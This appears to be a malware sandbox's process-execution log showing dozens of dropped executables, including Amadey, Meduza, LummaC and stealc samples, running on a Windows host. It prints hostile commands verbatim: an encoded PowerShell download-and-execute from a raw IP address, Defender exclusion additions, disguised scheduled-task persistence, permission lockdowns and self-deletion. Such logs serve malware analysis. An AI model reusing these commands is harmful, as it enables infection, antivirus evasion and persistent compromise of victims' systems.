  "C:\Users\Admin\AppData\Local\Temp\a\6606.exe"
  2⤵
  PID:14700
- C:\Users\Admin\AppData\Local\Temp\a\set17.exe
  "C:\Users\Admin\AppData\Local\Temp\a\set17.exe"
  2⤵
  PID:14168
- - C:\Users\Admin\AppData\Local\Temp\is-AJ09A.tmp\is-683J8.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-AJ09A.tmp\is-683J8.tmp" /SL4 $9026E "C:\Users\Admin\AppData\Local\Temp\a\set17.exe" 1048213 52224
    3⤵
    PID:14400
  - - C:\Program Files (x86)\PH Previewer\previewer.exe
      "C:\Program Files (x86)\PH Previewer\previewer.exe" -i
      4⤵
      PID:15168
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" helpmsg 8
      4⤵
      PID:15156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 8
        5⤵
        
        PID:16012
  - - C:\Program Files (x86)\PH Previewer\previewer.exe
      "C:\Program Files (x86)\PH Previewer\previewer.exe" -s
      4⤵
      PID:15856
- C:\Users\Admin\AppData\Local\Temp\a\VBA65-KB974945-x86-EN.exe
  "C:\Users\Admin\AppData\Local\Temp\a\VBA65-KB974945-x86-EN.exe"
  2⤵
  PID:14452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAYQB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAbQBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAdgBuACMAPgA="
    3⤵
    PID:15684
- - C:\Users\Admin\AppData\Roaming\VBA65-KB974945-x86-ENU.exe
    "C:\Users\Admin\AppData\Roaming\VBA65-KB974945-x86-ENU.exe"
    3⤵
    PID:15908
- - C:\Users\Admin\AppData\Roaming\XClient.exe
    "C:\Users\Admin\AppData\Roaming\XClient.exe"
    3⤵
    PID:16052
- - C:\Users\Admin\AppData\Roaming\etc.exe
    "C:\Users\Admin\AppData\Roaming\etc.exe"
    3⤵
    PID:16252
- C:\Users\Admin\AppData\Local\Temp\a\Meduza.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Meduza.exe"
  2⤵
  PID:14960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a\Meduza.exe"
    3⤵
    PID:4504
  - - C:\Windows\system32\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:4692
- C:\Users\Admin\AppData\Local\Temp\a\winlog.exe
  "C:\Users\Admin\AppData\Local\Temp\a\winlog.exe"
  2⤵
  PID:15288
- C:\Users\Admin\AppData\Local\Temp\a\KiffAppU1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\KiffAppU1.exe"
  2⤵
  PID:15920
- C:\Users\Admin\AppData\Local\Temp\a\aafg31.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aafg31.exe"
  2⤵
  PID:16556
- C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe"
  2⤵
  PID:16820
- - C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
    "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe"
    3⤵
    PID:17240
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:6308
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8bff37b77" /P "Admin:N"&&CACLS "..\e8bff37b77" /P "Admin:R" /E&&Exit
      4⤵
      PID:1752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:7508
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "yiueea.exe" /P "Admin:N"
        5⤵
        
        PID:7832
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "yiueea.exe" /P "Admin:R" /E
        5⤵
        
        PID:13948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:10640
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\e8bff37b77" /P "Admin:N"
        5⤵
        
        PID:7692
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\e8bff37b77" /P "Admin:R" /E
        5⤵
        
        PID:7728
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
      4⤵
      PID:12032
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
        5⤵
        
        PID:12608
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12608 -s 616
        6⤵
        Program crash
        
        PID:13700
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
      4⤵
      PID:12300
- C:\Users\Admin\AppData\Local\Temp\a\soso.exe
  "C:\Users\Admin\AppData\Local\Temp\a\soso.exe"
  2⤵
  PID:16992
- - C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
    "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"
    3⤵
    PID:2052
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit
      4⤵
      PID:5208
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:7428
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "yiueea.exe" /P "Admin:N"
        5⤵
        
        PID:8176
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "yiueea.exe" /P "Admin:R" /E
        5⤵
        
        PID:16028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:7648
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\577f58beff" /P "Admin:N"
        5⤵
        
        PID:10672
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\577f58beff" /P "Admin:R" /E
        5⤵
        
        PID:11384
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:5228
  - - C:\Users\Admin\AppData\Local\Temp\1000061001\latestX.exe
      "C:\Users\Admin\AppData\Local\Temp\1000061001\latestX.exe"
      4⤵
      PID:15784
  - - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
      4⤵
      PID:5324
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        
        PID:7376
  - - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
      "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
      4⤵
      PID:7368
  - - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
      4⤵
      PID:8680
- C:\Users\Admin\AppData\Local\Temp\a\1111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
  2⤵
  PID:17188
- C:\Users\Admin\AppData\Local\Temp\a\Install_WinX64X86.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Install_WinX64X86.exe"
  2⤵
  PID:6860
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 6860 -s 548
    3⤵
    - Program crash
    PID:14196
- C:\Users\Admin\AppData\Local\Temp\a\fil111e.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fil111e.exe"
  2⤵
  PID:4712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IAAkAGMAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABjADQAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAYwAzAD0AJwBhAGQAUwB0AHIAaQBuAGcAKAAnACcAaAB0AHQAcAA6AC8ALwA4ADAALgA2ADYALgA3ADkALgAyADcALwBvAC4AcABuAGcAJwAnACkAJwA7ACQAVABDAD0ASQBgAEUAYABYACAAKAAkAGMAMQAsACQAYwA0ACwAJABjADMAIAAtAEoAbwBpAG4AIAAnACcAKQB8AEkAYABFAGAAWAA=
    3⤵
    PID:8404
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 8404 -s 2328
      4⤵
      Program crash
      PID:5656
- C:\Users\Admin\AppData\Local\Temp\a\Clic.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Clic.exe"
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSTART.bat" "
    3⤵
    PID:2816
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vbs.vbs"
      4⤵
      PID:11004
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UuU.bat" "
        5⤵
        
        PID:12564
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\U&U.exe"'
        6⤵
        
        PID:8292
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\U&O.exe"'
        6⤵
        
        PID:6544
- C:\Users\Admin\AppData\Local\Temp\a\stealc_freestyleebet.exe
  "C:\Users\Admin\AppData\Local\Temp\a\stealc_freestyleebet.exe"
  2⤵
  PID:9924
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 9924 -s 1164
    3⤵
    - Program crash
    PID:13848
- C:\Users\Admin\AppData\Local\Temp\a\ummaa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ummaa.exe"
  2⤵
  PID:3812
- - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
    3⤵
    PID:6752
- C:\Users\Admin\AppData\Local\Temp\a\4t.exe
  "C:\Users\Admin\AppData\Local\Temp\a\4t.exe"
  2⤵
  PID:14912
- C:\Users\Admin\AppData\Local\Temp\a\axb.exe
  "C:\Users\Admin\AppData\Local\Temp\a\axb.exe"
  2⤵
  PID:10748
- - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
    "C:\Users\Admin\AppData\Local\Temp\a\axb.exe"
    3⤵
    PID:7304
  - - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\axb.exe" "--multiprocessing-fork" "parent_pid=7304" "pipe_handle=552"
      4⤵
      PID:7984
  - - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\axb.exe" "--multiprocessing-fork" "parent_pid=7304" "pipe_handle=312"
      4⤵
      PID:7968
  - - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\axb.exe" "--multiprocessing-fork" "parent_pid=7304" "pipe_handle=516"
      4⤵
      PID:7948
  - - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\axb.exe" "--multiprocessing-fork" "parent_pid=7304" "pipe_handle=508"
      4⤵
      PID:7908
  - - C:\Users\Admin\AppData\Local\Temp\onefile_10748_133386841350713972\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\axb.exe" "--multiprocessing-fork" "parent_pid=7304" "pipe_handle=496"
      4⤵
      PID:7576
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:8432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5308
- C:\Users\Admin\AppData\Local\Temp\a\rockas.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rockas.exe"
  2⤵
  PID:7264
- C:\Users\Admin\AppData\Local\Temp\a\ela205.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ela205.exe"
  2⤵
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\a\s5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\s5.exe"
  2⤵
  PID:7888
- C:\Users\Admin\AppData\Local\Temp\a\UMR.exe
  "C:\Users\Admin\AppData\Local\Temp\a\UMR.exe"
  2⤵
  PID:8164
- C:\Users\Admin\AppData\Local\Temp\a\taskhost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\taskhost.exe"
  2⤵
  PID:7964
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:9552
- C:\Users\Admin\AppData\Local\Temp\a\Akhmin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Akhmin.exe"
  2⤵
  PID:9152
- C:\Users\Admin\AppData\Local\Temp\a\Cryptedmafozo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Cryptedmafozo.exe"
  2⤵
  PID:9236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:9716
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9716 -s 688
      4⤵
      Program crash
      PID:12164
- C:\Users\Admin\AppData\Local\Temp\a\test10.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
  2⤵
  PID:9996
- - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
    3⤵
    PID:13036
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\ea3d816b-4ffa-4599-b9f2-a9b1e454a2cb" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:9740
  - - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
      "C:\Users\Admin\AppData\Local\Temp\a\test10.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:16152
    - - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\test10.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:17200
- C:\Users\Admin\AppData\Local\Temp\a\build838124214.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build838124214.exe"
  2⤵
  PID:2536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "build838124214" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\build838124214.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\build838124214.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\build838124214.exe"
    3⤵
    PID:11212
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:13656
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:3420
- C:\Users\Admin\AppData\Local\Temp\a\s562pitbph7ny.exe
  "C:\Users\Admin\AppData\Local\Temp\a\s562pitbph7ny.exe"
  2⤵
  PID:10928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:11516
- C:\Users\Admin\AppData\Local\Temp\a\easy.exe
  "C:\Users\Admin\AppData\Local\Temp\a\easy.exe"
  2⤵
  PID:1068
- C:\Users\Admin\AppData\Local\Temp\a\ok.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ok.exe"
  2⤵
  PID:11856
- C:\Users\Admin\AppData\Local\Temp\a\build838.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build838.exe"
  2⤵
  PID:12236
- C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
  2⤵
  PID:12664
- - C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
    3⤵
    PID:15252
- C:\Users\Admin\AppData\Local\Temp\a\Mfceum-4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Mfceum-4.exe"
  2⤵
  PID:13332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4068
- C:\Users\Admin\AppData\Local\Temp\a\Ivnut-Z2K-2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ivnut-Z2K-2.exe"
  2⤵
  PID:14548
- C:\Users\Admin\AppData\Local\Temp\a\Z2K-1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Z2K-1.exe"
  2⤵
  PID:16136
- C:\Users\Admin\AppData\Local\Temp\a\Rrobknnz-Z2K.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Rrobknnz-Z2K.exe"
  2⤵
  PID:4744
- C:\Users\Admin\AppData\Local\Temp\a\HEXO-SOFTWARE-1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HEXO-SOFTWARE-1.exe"
  2⤵
  PID:16960
- C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
  2⤵
  PID:17392
- C:\Users\Admin\AppData\Local\Temp\a\Ivnut-Z2K-3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ivnut-Z2K-3.exe"
  2⤵
  PID:2144
- C:\Users\Admin\AppData\Local\Temp\a\overlaycrypt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\overlaycrypt.exe"
  2⤵
  PID:15024
- C:\Users\Admin\AppData\Local\Temp\a\55555.exe
  "C:\Users\Admin\AppData\Local\Temp\a\55555.exe"
  2⤵
  PID:8412
- C:\Users\Admin\AppData\Local\Temp\a\Lrbaski.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Lrbaski.exe"
  2⤵
  PID:8580
- C:\Users\Admin\AppData\Local\Temp\a\LummaC.exe
  "C:\Users\Admin\AppData\Local\Temp\a\LummaC.exe"
  2⤵
  PID:14036
- C:\Users\Admin\AppData\Roaming\KBDSL\pdfreader.exe
  "C:\Users\Admin\AppData\Roaming\KBDSL\pdfreader.exe"
  2⤵
  PID:16488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:12092
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:9320
- C:\Users\Admin\AppData\Local\Temp\a\fasfqwrqweqw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fasfqwrqweqw.exe"
  2⤵
  PID:8252
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:9572
- C:\Users\Admin\AppData\Local\Temp\a\Moriwnrn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Moriwnrn.exe"
  2⤵
  PID:9980
- C:\Users\Admin\AppData\Local\Temp\a\Eppzjtedzmk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Eppzjtedzmk.exe"
  2⤵
  PID:10400
- C:\Users\Admin\AppData\Local\Temp\a\buildp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\buildp.exe"
  2⤵
  PID:8048
- - C:\Users\Admin\AppData\Local\Temp\a\buildp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\buildp.exe"
    3⤵
    PID:8064
  - - C:\Users\Admin\AppData\Local\Temp\a\buildp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\buildp.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:7048
    - - C:\Users\Admin\AppData\Local\Temp\a\buildp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\buildp.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:5332
- C:\Users\Admin\AppData\Local\Temp\a\autorun.exe
  "C:\Users\Admin\AppData\Local\Temp\a\autorun.exe"
  2⤵
  PID:11724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:15332
- C:\Users\Admin\AppData\Local\Temp\a\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Install.exe"
  2⤵
  PID:12996
- C:\Users\Admin\AppData\Local\Temp\a\a15pupoq0.exe
  "C:\Users\Admin\AppData\Local\Temp\a\a15pupoq0.exe"
  2⤵
  PID:1716
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:14976
- C:\Users\Admin\AppData\Local\Temp\a\finally.exe
  "C:\Users\Admin\AppData\Local\Temp\a\finally.exe"
  2⤵
  PID:13912
- C:\Users\Admin\AppData\Local\Temp\a\fqwrqwesda.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fqwrqwesda.exe"
  2⤵
  PID:15140
- - C:\Users\Admin\AppData\Local\Temp\a\fqwrqwesda.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fqwrqwesda.exe"
    3⤵
    PID:13252
- C:\Users\Admin\AppData\Local\Temp\a\RazerSynapse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\RazerSynapse.exe"
  2⤵
  PID:15320
- C:\Users\Admin\AppData\Local\Temp\a\Encrypted123.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Encrypted123.exe"
  2⤵
  PID:16332
- - C:\Users\Admin\AppData\Local\Temp\a\Encrypted123.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Encrypted123.exe"
    3⤵
    PID:2728
- C:\Users\Admin\AppData\Local\Temp\a\signed.exe
  "C:\Users\Admin\AppData\Local\Temp\a\signed.exe"
  2⤵
  PID:9840
- C:\Users\Admin\AppData\Local\Temp\a\installs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\installs.exe"
  2⤵
  PID:7416
- C:\Users\Admin\AppData\Local\Temp\a\newbin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newbin.exe"
  2⤵
  PID:15224
- C:\Users\Admin\AppData\Local\Temp\a\Asd11.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Asd11.exe"
  2⤵
  PID:10772
- C:\Users\Admin\AppData\Local\Temp\a\v16p1gseo3t8fb.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v16p1gseo3t8fb.exe"
  2⤵
  PID:12244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:8176
- C:\Users\Admin\AppData\Local\Temp\a\Helper.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Helper.exe"
  2⤵
  PID:1752
- C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrokersidedark2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrokersidedark2.exe"
  2⤵
  PID:15168

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z5041770.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z5041770.exe
1⤵
PID:3524
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\z6894540.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\z6894540.exe
  2⤵
  PID:228
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\s4400743.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\s4400743.exe
    3⤵
    PID:4992

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\q5460022.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\q5460022.exe
1⤵
PID:2092
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:5000
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 552
  2⤵
  - Program crash
  PID:5080

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\z1975681.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\z1975681.exe
1⤵
PID:1268
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\r7048253.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\r7048253.exe
  2⤵
  PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kmyuyq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'MicrosoftUpdateTaskMachineCQ' /tr '''C:\Users\Admin\AppData\Roaming\Microsoft\SyncHelper\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\SyncHelper\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftUpdateTaskMachineCQ' -RunLevel 'Highest' -Force; }
1⤵
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#itggs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'MGUpdateTaskMachineQT' /tr '''C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MGUpdateTaskMachineQT' -RunLevel 'Highest' -Force; }
1⤵
PID:4756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
